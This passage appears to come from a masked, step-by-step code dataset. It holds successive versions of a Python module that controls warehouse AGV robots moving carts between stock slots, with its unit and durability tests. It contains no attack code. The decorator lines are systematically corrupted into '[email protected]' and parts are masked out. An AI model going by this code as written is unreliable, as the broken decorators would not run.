callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\ndef _call(agvId, locId):\n if api.isCartLoc(locId):\n api.move(agvId, locId + '.1')\n lockStockA(agvId, locId)\n try:\n api.mission(agvId, 1)\n except Exception as e:\n unlockStockA(agvId, locId)\n raise e\n else:\n api.move(agvId, locId)\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + 
'.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\ndef _moveCart(agvId, srcLoc, locId, cartId):\n try:\n c = api.mission(agvId, 2)\n if c:\n checkCart(cartId, c)\n api.move(agvId, srcLoc + '.2')\n except Exception as e:\n pass\n finally:\n unlockStockA(agvId, srcLoc)\n loc, type = api.getMissionType('get', '', srcLoc)\n api.mission(agvId, type)\n loc, type = api.getMissionType('put', srcLoc, locId)\n api.move(agvId, loc + '.3')\n api.mission(agvId, type)\n lockStockA(agvId, locId)\n try:\n api.move(agvId, locId + '.4')\n api.mission(agvId, 5)\n api.move(agvId, locId + '.5')\n finally:\n unlockStockA(agvId, locId)\n freeAgv(agvId)\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\ndef move(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n try:\n locId = getOriginPoint(locId)\n _run(func=api.move, args=(agvId, locId), callback=finishCallback,\n obj=obj)\n except Exception as e:\n freeAgv(agvId)\n raise e\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\n<mask token>\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert 
resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\ndef testgetStockA():\n assert getStockA('stockA_row10_col3') == 9003\n assert getStockA('stockA_row10_col4') == 9004\n assert getStockA('stockA_row1_col1') == 1001\n assert getStockA('stockA_row2_col2') == 1002\n assert getStockA('stockA_row3_col2') == 3002\n assert getStockA('stockA_row4_col2') == 3002\n assert getStockA('stockA_row4_col2.1') == 3002\n assert getStockA('stockB_row4_col2.1') == None\n assert getStockA('begin_1') == None\n assert getStockA('seat_1') == None\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n 
print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\n<mask token>\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\n<mask token>\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = 
os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\ndef _call(agvId, locId):\n if api.isCartLoc(locId):\n api.move(agvId, locId + '.1')\n lockStockA(agvId, locId)\n try:\n api.mission(agvId, 1)\n except Exception as e:\n unlockStockA(agvId, locId)\n raise e\n else:\n api.move(agvId, locId)\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + 
'.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\ndef _moveCart(agvId, srcLoc, locId, cartId):\n try:\n c = api.mission(agvId, 2)\n if c:\n checkCart(cartId, c)\n api.move(agvId, srcLoc + '.2')\n except Exception as e:\n pass\n finally:\n unlockStockA(agvId, srcLoc)\n loc, type = api.getMissionType('get', '', srcLoc)\n api.mission(agvId, type)\n loc, type = api.getMissionType('put', srcLoc, locId)\n api.move(agvId, loc + '.3')\n api.mission(agvId, type)\n lockStockA(agvId, locId)\n try:\n api.move(agvId, locId + '.4')\n api.mission(agvId, 5)\n api.move(agvId, locId + '.5')\n finally:\n unlockStockA(agvId, locId)\n freeAgv(agvId)\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\ndef move(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n try:\n locId = getOriginPoint(locId)\n _run(func=api.move, args=(agvId, locId), callback=finishCallback,\n obj=obj)\n except Exception as e:\n freeAgv(agvId)\n raise e\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\ndef Init():\n import interface.dashboard.dashboardApi\n locationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)\n time.sleep(3)\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef 
testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\ndef testgetStockA():\n assert getStockA('stockA_row10_col3') == 9003\n assert getStockA('stockA_row10_col4') == 9004\n assert getStockA('stockA_row1_col1') == 1001\n assert getStockA('stockA_row2_col2') == 1002\n assert getStockA('stockA_row3_col2') == 3002\n assert getStockA('stockA_row4_col2') == 3002\n assert getStockA('stockA_row4_col2.1') == 3002\n assert getStockA('stockB_row4_col2.1') == None\n assert getStockA('begin_1') == None\n assert getStockA('seat_1') == None\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\[email protected]\ndef move_cart(cartId, srcLoc, destLoc, agvId=None):\n print(cartId, srcLoc, destLoc)\n counter.setPrint(True)\n\n def callback1(obj):\n if obj['result'] == -1:\n print('error, system exit')\n obj['finish'] = True\n sys.exit(-1)\n else:\n log.warning(obj['agv'], 'start move from', obj['loc1'], 'to',\n obj['loc2'])\n moveCart(obj['agv'], obj['cart'], obj['loc1'], obj['loc2'],\n callback2, obj)\n\n def callback2(obj):\n if obj['result'] == -1:\n print('error, system exit')\n obj['finish'] = True\n sys.exit(-1)\n else:\n log.warning(obj['agv'], 'arrived', obj['loc2'])\n obj['finish'] = True\n obj = {}\n obj['loc1'] = srcLoc\n obj['loc2'] = destLoc\n obj['cart'] = cartId\n print('call ', srcLoc)\n if agvId is None:\n agvId = 
apply(srcLoc)\n call(agvId, srcLoc, callback1, obj)\n while not utility.is_exited():\n if 'finish' in obj:\n break\n time.sleep(0.2)\n print('------ move ', srcLoc, ' to ', destLoc, ' finish ------')\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\ndef testtestPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n print(start)\n time.sleep(3)\n seat = currentJson['seat']\n seats = str.split(seat, ',')\n print(seat)\n time.sleep(3)\n for currentseat in seats:\n print(currentseat)\n 
time.sleep(3)\n time.sleep(10)\n result = True\n return result\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\ndef testProcess(jsonData):\n utility.start()\n testPageAgvControl(jsonData)\n utility.finish()\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n",
"step-5": "#coding=utf-8\n# ycat\t\t\t2017-10-20\t create\n# AGV的控制 \nimport sys,os \nimport json\nimport setup\nif __name__ == '__main__':\n\tsetup.setCurPath(__file__)\nimport utility\nimport enhance\t\nimport threading\nimport time\nimport log\nimport re\nimport lock\nimport json_codec\nimport driver.agv.hdcAgvApi as api\ng_threads =[]\ng_carts = None\ng_point = None\ng_lock = threading.RLock()\nlocationEvent = enhance.event()\napi.locationEvent.connect(locationEvent.emit)\n\[email protected]()\ndef init():\n\tif utility.is_test():\n\t\treturn\n\tapi.init()\n\ttime.sleep(3)\n\ndef wait():\n\tglobal g_threads\n\tfor t in g_threads:\n\t\tt.join()\n\tg_threads.clear()\n\t\[email protected]()\ndef fini():\n\tif utility.is_test():\n\t\treturn\n\tapi.fini()\n\twait()\n\ng_stockLock = {}\n\ndef getStockA(loc):\n\tif loc[0:6] != \"stockA\":\n\t\t\treturn None\n\tm = re.search(\"stockA_row(\\d+)_col(\\d+).*\",loc)\n\tif m is None:\n\t\treturn None\n\trow = int(m.group(1))\n\tcol = int(m.group(2))\n\tif row is None:\n\t\treturn\n\tif row%2 != 1:\n\t\trow -= 1\n\treturn row*1000+col\n\t\[email protected](g_lock)\t\ndef checkTimeout(index,agvId,loc):\n\tglobal g_stockLock\n\tif index in g_stockLock:\n\t\tif utility.ticks() - g_stockLock[index] > 10*60*1000:\n\t\t\tunlockStockA(agvId,loc)\n\t\t\tlog.warning(\"delete timeout locked\",index)\n\t\t\t\n\t\n#解决在StockA两个车头对撞的问题 \ndef lockStockA(agvId,loc):\n\tglobal g_stockLock\n\tindex = getStockA(loc)\n\tif index is None:\n\t\treturn\n\tif index in g_stockLock:\n\t\tcheckTimeout(index,agvId,loc)\n\t\tlog.warning(agvId,loc,\"is locked, wait for unlock\")\n\t\tfor i in range(60*5):\n\t\t\tif index not in g_stockLock:\n\t\t\t\tbreak\n\t\t\ttime.sleep(1)\n\t\tlog.info(agvId,loc,\"wait for unlock success\")\n\tglobal g_lock\n\tlog.debug(agvId,\"lock\",loc,index)\n\tg_lock.acquire()\n\tg_stockLock[index] = utility.ticks()\n\tg_lock.release()\n\[email protected](g_lock)\t\ndef unlockStockA(agvId,loc):\n\tglobal g_stockLock\n\tindex = 
getStockA(loc)\n\tif index in g_stockLock:\n\t\tlog.debug(agvId,\"unlock\",loc,index)\n\t\tdel g_stockLock[index]\n\[email protected](g_lock)\ndef getPoint(originPoint):\n\tglobal g_point\n\tloadPoint()\n\tif g_point[originPoint] is not None:\n\t\treturn g_point[originPoint]\n\n\treturn originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n\tglobal g_point\n\tloadPoint()\n\tfor itemIndex in g_point:\n\t\tif g_point[itemIndex] == point:\n\t\t\treturn itemIndex\n\treturn point\n\[email protected](g_lock)\ndef loadPoint():\n\tglobal g_point\n\tfilePath = os.path.dirname(__file__)\n\tfileName = \"point.cfg\"\n\tif filePath:\n\t\tfileName = filePath + \"/\" + fileName\n\tg_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\t\ndef checkCart(cartId,scanId):\n\tscanId = scanId.strip()\n\tdef loadCart():\n\t\tglobal g_carts\n\t\tp = os.path.dirname(__file__)\n\t\tpp = \"cart.cfg\"\n\t\tif p:\n\t\t\tpp = p+\"/\"+pp \n\t\tg_carts = json_codec.load_file(pp)\n\t\t\n\tdef saveCart():\n\t\tglobal g_carts\n\t\tp = os.path.dirname(__file__)\n\t\tpp = \"cart.cfg\"\n\t\tif p:\n\t\t\tpp = p+\"/\"+pp \n\t\tjson_codec.dump_file(pp,g_carts)\n\t\t\n\tdef findCart(scanId):\n\t\tglobal g_carts\n\t\tfor c in g_carts:\n\t\t\tif g_carts[c] == scanId:\n\t\t\t\treturn c\n\t\treturn \"unknown\"\n\t\t\n\tglobal g_carts\n\tif g_carts is None:\n\t\tloadCart()\n\tif cartId in g_carts:\n\t\tif scanId != g_carts[cartId]:\n\t\t\tlog.error(\"货架ID不正确,期望货架:\"+cartId+\", 实际货架:\"+findCart(scanId))\n\t\t\traise Exception(\"货架ID不正确,期望货架:\"+cartId+\", 实际货架:\"+findCart(scanId))\n\telse:\n\t\tg_carts[cartId] = scanId\n\t\tsaveCart()\n\t\n#finishCallback参数: finishCallback(obj)\n#obj会自动带上下面三个参数 \n#obj[\"agv\"] = agvId\n#obj[\"result\"] = 0\n#obj[\"resultDesc\"] = \"success\"\n\t\ndef _run(func,args,callback,obj):\n\tdef threadFunc(func,args,callback,obj):\n\t\thasCallback = False\n\t\ttry:\n\t\t\tfunc(*args)\n\t\t\tif utility.is_exited():\n\t\t\t\treturn\n\t\t\thasCallback = 
True\n\t\t\tcallback(obj)\n\t\texcept Exception as e:\n\t\t\tobj[\"result\"] = -1\n\t\t\tobj[\"resultDesc\"] = str(e)\n\t\t\tlog.exception(\"agvCtrl:\",e)\n\t\t\tif \"agv\" in obj:\n\t\t\t\tagvId= obj[\"agv\"]\n\t\t\t\tlog.debug(\"小车:\"+agvId+\",出现未经处理的异常,正在返航 \")\n\t\t\t\trestAgv(agvId)\n\t\t\t\tfreeAgv(agvId)\n\t\t\tif not hasCallback:\n\t\t\t\tcallback(obj)\n\tt = threading.Thread(target=threadFunc,args=(func,args,callback,obj))\n\tglobal g_threads\n\tt.start()\n\tg_threads.append(t)\n\t\ndef _initObj(obj,agvId):\n\tobj[\"agv\"] = agvId\n\tobj[\"result\"] = 0\n\tobj[\"resultDesc\"] = \"success\"\n\t\ndef _call(agvId,locId):\n\tif api.isCartLoc(locId):\n\t\tapi.move(agvId,locId+\".1\")\n\t\tlockStockA(agvId,locId)\n\t\ttry:\n\t\t\tapi.mission(agvId,1) #旋转——》钻入货架——》扫码——》返回货架id号码 \n\t\texcept Exception as e:\n\t\t\tunlockStockA(agvId,locId)\n\t\t\traise e\n\telse:\n\t\tapi.move(agvId,locId)\n\ndef apply(locId):\n\tlocId=getOriginPoint(locId)\n\n\treturn api.apply(locId+'.1')\n\t\ndef call(agvId,locId,finishCallback,obj):\n\t_initObj(obj,agvId)\n\tlocId=getOriginPoint(locId)\n\ttry:\n\n\t\t_run(func=_call,args=(agvId,locId),callback=finishCallback,obj=obj)\n\texcept Exception as e:\n\t\trestAgv(agvId)\n\t\tfreeAgv(agvId)\n\t\traise e\n\treturn agvId\n\t \ndef _moveCart(agvId,srcLoc,locId,cartId):\n\ttry:\n\t\tc = api.mission(agvId,2) #顶升任务,这个也会返回货架ID \n\t\tif c:\n\t\t\tcheckCart(cartId,c)\n\t\tapi.move(agvId,srcLoc+\".2\") \n\texcept Exception as e:\n\t\t#TODO:ycat api.move(agvId,srcLoc+\".2\")\n\t\t#TODO:ycat raise e\n\t\tpass\n\tfinally:\n\t\tunlockStockA(agvId,srcLoc)\n\t\n\tloc,type = api.getMissionType(\"get\",\"\",srcLoc)\n\tapi.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动\n\t\n\tloc,type = api.getMissionType(\"put\",srcLoc,locId)\n\tapi.move(agvId,loc+\".3\")\n\tapi.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动\n\tlockStockA(agvId,locId)\n\ttry:\n\t\tapi.move(agvId,locId+\".4\")\n\t\tapi.mission(agvId,5) #放下货架 \n\t\tapi.move(agvId,locId+\".5\") #返航 
\n\tfinally:\n\t\tunlockStockA(agvId,locId)\n\tfreeAgv(agvId)\n\t \n#带货架运输 \ndef moveCart(agvId,cartId,srcLoc,locId,finishCallback,obj):\t \n\t_initObj(obj,agvId)\n\tassert api.isCartLoc(cartId)\n\t#移动货架前,一定是locked状态 \n\t#assert api.isLocked(agvId)\n\tsrcLoc = getOriginPoint(srcLoc)\n\tlocId = getOriginPoint(locId)\n\ttry:\n\t\t_run(func=_moveCart,args=(agvId,srcLoc,locId,cartId),callback=finishCallback,obj=obj) \n\texcept Exception as e:\n\t\trestAgv(agvId)\n\t\tfreeAgv(agvId)\n\t\traise e\n\t\t\t \n\t\t\t\n#不带货架运输 \ndef move(agvId,locId,finishCallback,obj):\n\t_initObj(obj,agvId)\t\t\n\t#移动前,一定是locked状态 \n\t#assert api.isLocked(agvId)\n\ttry:\n\t\tlocId=getOriginPoint(locId)\n\t\t_run(func=api.move,args=(agvId,locId),callback=finishCallback,obj=obj) \n\texcept Exception as e:\n\t\tfreeAgv(agvId)\n\t\traise e\n\t\n#释放对agv的占用 \ndef freeAgv(agvId): \n\ttry:\n\t\tapi.unlock(agvId)\n\texcept Exception as e:\n\t\tlog.exception(\"freeAgv\",e)\n\t\n#回归转盘\ndef restAgv(agvId):\n\tagvId2 = api.getAgvId(agvId)\n\tapi.reset(agvId2)\n\n\ndef Init():\n\timport interface.dashboard.dashboardApi\n\tlocationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)\n\ttime.sleep(3)\n################# unit test ################# \ndef testgetPoint():\n\tresulta= getPoint(\"StockA_row7_col4\")\n\tassert resulta== \"begin_1\"\n\tresultb= getPoint(\"StockA_row8_col4\")\n\tassert resultb == \"begin_2\"\n\n\ndef testgetOrginPoint():\n\tresulta= getOriginPoint(\"begin_1\")\n\tassert resulta== \"StockA_row7_col4\"\n\tresultb= getOriginPoint(\"begin_2\")\n\tassert \tresultb == \"StockA_row8_col4\"\n\tresultc = getOriginPoint(\"hhahahaa\")\n\n\tassert resultc == \"hhahahaa\"\n\n\ndef testgetStockA():\n\tassert getStockA(\"stockA_row10_col3\") == 9003\n\tassert getStockA(\"stockA_row10_col4\") == 9004\n\tassert getStockA(\"stockA_row1_col1\") == 1001\n\tassert getStockA(\"stockA_row2_col2\") == 1002\n\tassert getStockA(\"stockA_row3_col2\") == 3002\n\tassert getStockA(\"stockA_row4_col2\") 
== 3002\n\tassert getStockA(\"stockA_row4_col2.1\") == 3002\n\tassert getStockA(\"stockB_row4_col2.1\") == None\n\tassert getStockA(\"begin_1\") == None\n\tassert getStockA(\"seat_1\") == None\n\ndef testcheckCart():\n\tglobal g_carts\n\tg_carts = None\n\tcheckCart(\"CART9001\",\"591\")\n\tcheckCart(\"CART9002\",\"592\")\n\tgg = json_codec.load_file(\"cart.cfg\")\n\tassert \"CART9001\" in gg\n\tassert \"CART9002\" in gg\n\tassert gg[\"CART9001\"] == \"591\"\n\tassert gg[\"CART9002\"] == \"592\"\n\tcheckCart(\"CART9002\",\"592\")\n\tcheckCart(\"CART9001\",\"591\")\n\ttry:\n\t\tcheckCart(\"CART9002\",\"591\")\n\t\tassert 0\n\texcept Exception as e:\n\t\ts = str(e)\n\t\tassert s.find(\"货架ID不正确,期望货架:CART9002, 实际货架:CART9001\") != -1\n\t\t\nimport counter\[email protected]\ndef move_cart(cartId,srcLoc,destLoc,agvId=None):\n\tprint(cartId,srcLoc,destLoc)\n\tcounter.setPrint(True)\n\tdef callback1(obj):\n\t\tif obj[\"result\"] == -1: \n\t\t\tprint(\"error, system exit\")\n\t\t\tobj[\"finish\"] = True\n\t\t\tsys.exit(-1) \n\t\telse:\n\t\t\tlog.warning(obj[\"agv\"],\"start move from\",obj[\"loc1\"],\"to\",obj[\"loc2\"]) \n\t\t\tmoveCart(obj[\"agv\"],obj[\"cart\"],obj[\"loc1\"],obj[\"loc2\"],callback2,obj)\n\t\n\tdef callback2(obj):\n\t\tif obj[\"result\"] == -1: \n\t\t\tprint(\"error, system exit\")\n\t\t\tobj[\"finish\"] = True\n\t\t\tsys.exit(-1) \n\t\telse:\n\t\t\tlog.warning(obj[\"agv\"],\"arrived\",obj[\"loc2\"])\n\t\tobj[\"finish\"] = True\n\t\t\t\n\tobj = {}\n\tobj[\"loc1\"] = srcLoc\n\tobj[\"loc2\"] = destLoc\n\tobj[\"cart\"] = cartId\n\tprint(\"call \",srcLoc)\n\tif agvId is None:\n\t\tagvId = apply(srcLoc)\n\n\tcall(agvId,srcLoc,callback1,obj)\n\twhile not utility.is_exited():\n\t\tif \"finish\" in obj:\n\t\t\tbreak\n\t\ttime.sleep(0.2)\n\tprint(\"------ move \",srcLoc,\" to \",destLoc,\" finish ------\")\n\t\n\t\n#def func1(start,stock1,stock2):\n#\tprint(\"-------------------- start thread ------------------------\")\n#\ttime.sleep(1) \n#\tcartId = 
\"CART9009\"\n#\tmove_cart(cartId,start,stock1)\n#\tnext = stock1\n#\tfor s in seats:\n#\t\tmove_cart(cartId,next,\"seat\"+str(s)+\"_1\")\n#\t\tif next == stock1:\n#\t\t\tnext = stock2\n#\t\telse:\n#\t\t\tnext = stock1\n#\t\tmove_cart(cartId,\"seat\"+str(s)+\"_1\",next)\n#\t\t# move_cart(cartId, s, next)\n#\tprint(\"=======================================\")\n#\tprint(\"finish func1\")\n#\tprint(\"=======================================\")\n\ndef func2(stock1,stock2):\n\tprint(\"-------------------- start thread ------------------------\",stock1,stock2)\n\ttime.sleep(1) \n\tcartId = \"CART9009\"\n\tfor i in range(20):\n\t\tprint(\"current loop is - \",i.__str__())\n\t\tmove_cart(cartId,stock1,stock2)\n\t\tmove_cart(cartId,stock2,stock1) \n\t\tprint(\"current loop end - \",i.__str__())\n\tprint(\"=======================================\")\n\tprint(\"finish func2\")\n\tprint(\"=======================================\")\t\n\ndef 